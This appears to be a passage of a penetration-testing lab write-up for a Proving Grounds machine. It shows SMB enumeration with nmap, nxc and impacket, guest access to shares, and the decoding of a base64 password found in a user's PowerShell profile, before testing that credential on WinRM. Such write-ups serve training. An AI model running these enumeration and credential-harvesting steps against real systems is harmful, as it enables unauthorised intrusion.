SMB
Nmap discovered a Windows Directory server on the ports 139 and 445 of the 192.168.225.152 host.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/compromised]
└─$ nmap --script smb-vuln* -sV -p139,445 $IP
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-28 20:02 CEST
Nmap scan report for 192.168.225.152
Host is up (0.021s latency).
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.24 seconds
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/compromised]
└─$ nmap --script smb-enum-shares -sV -p139,445 $IP
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-28 20:02 CEST
Nmap scan report for 192.168.225.152
Host is up (0.022s latency).
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.28 secondsShare mapping failed.
Null Session
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/compromised]
└─$ nxc smb $IP -u '' -p '' --shares --interfaces
SMB 192.168.225.152 445 COMPROMISED [*] Windows 10 / Server 2019 Build 17763 x64 (name:COMPROMISED) (domain:compromised) (signing:False) (SMBv1:False)
SMB 192.168.225.152 445 COMPROMISED [-] compromised\: STATUS_ACCESS_DENIED
SMB 192.168.225.152 445 COMPROMISED [-] Error enumerating shares: Error occurs while reading from remote(104)
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/compromised]
└─$ nxc smb $IP -u 'blah' -p blah --shares --interfaces
SMB 192.168.225.152 445 COMPROMISED [*] Windows 10 / Server 2019 Build 17763 x64 (name:COMPROMISED) (domain:compromised) (signing:False) (SMBv1:False)
SMB 192.168.225.152 445 COMPROMISED [+] compromised\blah:blah (Guest)
SMB 192.168.225.152 445 COMPROMISED [*] Enumerated shares
SMB 192.168.225.152 445 COMPROMISED Share Permissions Remark
SMB 192.168.225.152 445 COMPROMISED ----- ----------- ------
SMB 192.168.225.152 445 COMPROMISED ADMIN$ Remote Admin
SMB 192.168.225.152 445 COMPROMISED C$ Default share
SMB 192.168.225.152 445 COMPROMISED IPC$ READ Remote IPC
SMB 192.168.225.152 445 COMPROMISED Scripts$ READ
SMB 192.168.225.152 445 COMPROMISED Users$ READ Whole the target SMB server does not allow anonymous access, it allows guest access. The guest access has read access to the following shares;
IPC$Scripts$Users$
Having access to the IPC$ share means that RID Cycling can be conducted to enumerate users.
Scripts$ Share
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/compromised]
└─$ impacket-smbclient blah:blah@$IP
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# use Scripts$
# tree
/defrag.ps1
/fix-printservers.ps1
/install-features.ps1
/purge-temp.ps1
Finished - 0 files and folders4 PowerShell scripts.
defrag.ps1
# cat defrag.ps1
Optimize-Volume -DriveLetter C -Defrag -VerboseN/A
fix-printservers.ps1
# cat fix-printservers.ps1
$credential = New-Object System.Management.Automation.PSCredential ('scripting', $password)
$spooler = Get-WmiObject -Class Win32_Service -ComputerName (Read-Host -Prompt 'Server Name') -Credential $credential -Filter "Name='spooler'"
$spooler.stopservice()
$spooler.startservice()The spooler service has been confirmed to be operating on the target system.
scripting is a valid user.
install-features.ps1
# cat install-features.ps1
Install-WindowsFeature -Name WindowsPowerShellWebAccess -IncludeManagementToolsThis PowerShell script is rather ambiguous as PSWA might be present in the web servers.
purge-temp.ps1
# cat purge-temp.ps1
rm "C:\Users\*\Appdata\Local\Temp\*" "c:\Windows\Temp\*" -Recurse -Force -ErrorAction SilentlyContinueN/A
Users$ Share
# ls
drw-rw-rw- 0 Tue Jun 1 16:59:38 2021 .
drw-rw-rw- 0 Tue Jun 1 16:59:38 2021 ..
drw-rw-rw- 0 Tue Jun 1 16:59:38 2021 .NET v4.5
drw-rw-rw- 0 Tue Jun 1 16:59:37 2021 .NET v4.5 Classic
drw-rw-rw- 0 Tue Jun 1 16:56:44 2021 Administrator
drw-rw-rw- 0 Fri May 28 20:45:50 2021 All Users
drw-rw-rw- 0 Fri May 28 19:47:25 2021 Default
drw-rw-rw- 0 Fri May 28 20:45:50 2021 Default User
-rw-rw-rw- 174 Fri May 28 20:42:37 2021 desktop.ini
drw-rw-rw- 0 Fri May 28 12:53:18 2021 Public
drw-rw-rw- 0 Tue Jul 20 17:21:03 2021 scriptingThis appears to be the C:\Users directory
Credential
# pwd
/scripting/Documents/WindowsPowerShell
# ls
drw-rw-rw- 0 Tue Jun 1 17:00:27 2021 .
drw-rw-rw- 0 Tue Jun 1 17:00:27 2021 ..
-rw-rw-rw- 239 Tue Jun 1 17:00:27 2021 profile.ps1
# cat profile.ps1
$password = ConvertTo-SecureString "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('RgByAGkAZQBuAGQAcwBEAG8AbgB0AEwAZQB0AEYAcgBpAGUAbgBkAHMAQgBhAHMAZQA2ADQAUABhAHMAcwB3AG8AcgBkAHMA')))" -AsPlainText -ForceCredential find identified; /scripting/Documents/WindowsPowerShell/profile.ps1
Decoding
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/compromised]
└─$ echo RgByAGkAZQBuAGQAcwBEAG8AbgB0AEwAZQB0AEYAcgBpAGUAbgBkAHMAQgBhAHMAZQA2ADQAUABhAHMAcwB3AG8AcgBkAHMA | base64 -d
FriendsDontLetFriendsBase64PasswordsPassword for the scripting account decoded; FriendsDontLetFriendsBase64Passwords
Testing the credential against the target WinRM server.